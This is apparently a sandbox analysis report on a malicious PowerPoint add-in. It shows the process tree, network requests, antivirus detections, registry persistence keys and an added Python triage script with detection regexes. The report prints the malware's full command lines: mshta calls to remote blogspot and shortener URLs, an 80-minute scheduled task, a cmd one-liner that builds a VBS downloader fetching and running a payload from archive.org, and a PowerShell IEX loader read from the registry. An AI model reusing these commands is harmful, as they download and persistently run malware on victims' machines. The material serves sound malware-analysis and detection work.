Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | April 30, 2021, 9:43 a.m. | April 30, 2021, 9:45 a.m. |
Process tree
- POWERPNT.EXE (PID 996): "C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE" /S "C:\Users\test22\AppData\Local\Temp\Company Details.ppam"
- schtasks.exe (PID 8104): "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")
IP Address | Status |
---|---|
142.250.199.65 | Active |
142.250.204.110 | Active |
142.250.66.109 | Active |
142.250.66.41 | Active |
164.124.101.2 | Active |
172.217.25.14 | Active |
172.217.26.137 | Active |
207.241.227.129 | Active |
67.199.248.10 | Active |
67.199.248.17 | Active |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49812 172.217.26.137:443 | C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | 6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37 |
TLSv1 192.168.56.102:49810 142.250.199.65:443 | C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=misc-sni.blogspot.com | 9c:32:17:b5:e8:f9:04:a7:4d:a7:f0:b9:db:ca:b3:18:75:b5:cb:50 |
TLSv1 192.168.56.102:49819 207.241.227.129:443 | C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2 | OU=Domain Control Validated, CN=*.us.archive.org | 9c:3c:d6:6d:65:69:f2:95:8c:99:48:e3:e0:7f:14:38:36:4c:ba:d0 |
TLSv1 192.168.56.102:49814 142.250.66.41:443 | C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | 6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37 |
TLSv1 192.168.56.102:49815 142.250.66.41:443 | C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | 6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37 |
TLSv1 192.168.56.102:49813 172.217.26.137:443 | None | None | None |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://ia601409.us.archive.org/1/items/divonee111/divonee111.txt |
request | GET http://www.j.mp/ddsobpechateessentesathatesesjdw |
request | GET http://bit.ly/ddsobpechateessentesathatesesjdw |
request | GET https://yahameinhunbusorkoinai.blogspot.com/p/divine11111.html |
request | GET https://www.blogger.com/static/v1/widgets/115981500-css_bundle_v2.css |
request | GET https://www.blogger.com/static/v1/jsbin/1277698886-ieretrofit.js |
request | GET https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js |
request | GET https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9202096335134795169&zx=b73d5666-d098-4854-a4dd-8e948356adfd |
request | GET https://www.blogger.com/static/v1/widgets/1564291244-widgets.js |
request | GET https://resources.blogblog.com/img/icon18_edit_allbkg.gif |
request | GET https://resources.blogblog.com/img/icon18_wrench_allbkg.png |
request | GET https://www.blogger.com/blogin.g?blogspotURL=https://yahameinhunbusorkoinai.blogspot.com/p/divine11111.html&type=blog |
request | GET https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png |
request | GET https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png |
request | GET https://www.blogger.com/img/share_buttons_20_3.png |
request | GET https://ia601409.us.archive.org/1/items/divonee111/divonee111.txt |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\1277698886-ieretrofit[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\3858658042-comment_from_post_iframe[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\1564291244-widgets[1].js |
cmdline | mshta http://www.j.mp/ddsobpechateessentesathatesesjdw |
cmdline | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\") |
cmdline | schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\") |
cmdline | cMd /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs |
host | 172.217.25.14 |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM | reg_value | mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).MSOFFICELO)|IEX"", 0 : window.close") |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography | reg_value | "mshta""http://1230948%1230948@backbones1234511a.blogspot.com/p/newdivineback2.html" |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\(Default) | reg_value | "mshta""http://1230948%1230948@startthepartyup.blogspot.com/p/backbone15.html" |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo | reg_value | "mshta""http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup14.html" |
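The command lines and Run-key values collected above share a few traits: mshta launched with the vbscript: protocol handler or pointed at a remote page, URLs that carry a meaningless userinfo part (1230948%1230948@) in front of the real blogspot host, a scheduled task that re-fires every 80 minutes, and PowerShell pulling code out of a value under HKCU:\Software and piping it to IEX. The Python below is an added example, not part of the report, that turns those traits into a small triage over process command lines and registry values. The indicator names and regular expressions are this example's own, not a vendor signature set; the sample lines are copied from the report above, with the POWERPNT.EXE launch included as a line that should not fire.

```python
import re
from urllib.parse import urlsplit

# Indicator names and patterns are this example's own, derived from the
# command lines in the report; they are a triage aid, not a detection product.
INDICATORS = {
    # mshta fetching and executing a remote HTA/HTML page
    "mshta_remote_url": re.compile(r"\bmshta(?:\.exe)?\b.*?https?://", re.I | re.S),
    # mshta handed inline script through the vbscript: protocol handler
    "mshta_vbscript_handler": re.compile(r"\bmshta(?:\.exe)?\b.*?vbscript:", re.I | re.S),
    # scheduled task with a minute-based trigger (here: every 80 minutes)
    "schtasks_minute_trigger": re.compile(
        r"\bschtasks(?:\.exe)?\b.*?/sc\s+MINUTE\b", re.I | re.S),
    # PowerShell reading a registry value (gp = Get-ItemProperty) and piping it to IEX
    "powershell_iex_from_registry": re.compile(
        r"\(\s*gp\s+HK\w+:[^)]*\)\s*\.\w+\)*\s*\|\s*(?:IEX|Invoke-Expression)\b", re.I),
    # public URL shorteners used as the first hop
    "url_shortener": re.compile(r"https?://(?:www\.)?(?:bit\.ly|j\.mp)/", re.I),
}

URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.I)


def urls_with_userinfo(text):
    """Return (url, real_host) for every URL that carries a user@ prefix.
    The client ignores the userinfo part, so '1230948%1230948@' only serves
    to push the real host out of view in logs and quick reads."""
    hits = []
    for url in URL_RE.findall(text):
        parts = urlsplit(url)
        if parts.username is not None and parts.hostname:
            hits.append((url, parts.hostname))
    return hits


def triage(cmdline):
    """Return the sorted list of indicator names that fire on one line."""
    findings = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    if urls_with_userinfo(cmdline):
        findings.append("url_userinfo_obfuscation")
    return sorted(findings)


def triage_report(lines):
    """Map each line to its findings, dropping lines with none."""
    report = {}
    for line in lines:
        hits = triage(line)
        if hits:
            report[line] = hits
    return report


# Sample input: command lines and Run-key values taken from the report above.
SAMPLE_LINES = [
    r'mshta http://www.j.mp/ddsobpechateessentesathatesesjdw',
    r'''"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")''',
    r'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).MSOFFICELO)|IEX"", 0 : window.close")',
    r'"mshta""http://1230948%1230948@backbones1234511a.blogspot.com/p/newdivineback2.html"',
    r'"C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE" /S "C:\Users\test22\AppData\Local\Temp\Company Details.ppam"',
]

if __name__ == "__main__":
    for line, hits in triage_report(SAMPLE_LINES).items():
        print(", ".join(hits), "<-", line[:80])
```

The userinfo check is the one worth keeping even outside this sample: urlsplit().hostname returns the host that will actually be contacted, which is what belongs in a block list, while the text before the @ is noise.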
Engine | Detection |
---|---|
Alibaba | TrojanDownloader:VBA/MalDoc.ali1000101 |
Arcabit | VBA:Amphitryon.227 |
Kaspersky | HEUR:Trojan.MSOffice.SAgent.gen |
BitDefender | VBA:Amphitryon.227 |
NANO-Antivirus | Trojan.Ole2.Vbs-heuristic.druvzi |
MicroWorld-eScan | VBA:Amphitryon.227 |
Ad-Aware | VBA:Amphitryon.227 |
McAfee-GW-Edition | Artemis!Trojan |
FireEye | VBA:Amphitryon.227 |
Emsisoft | VBA:Amphitryon.227 (B) |
Ikarus | Trojan-Downloader.VBA.Agent |
GData | VBA:Amphitryon.227 |
AegisLab | Trojan.MSOffice.SAgent.4!c |
SentinelOne | Static AI - Malicious OPENXML |
Fortinet | VBA/Agent.3FED!tr |
parent_process | powerpnt.exe | martian_process | mshta http://www.j.mp/ddsobpechateessentesathatesesjdw |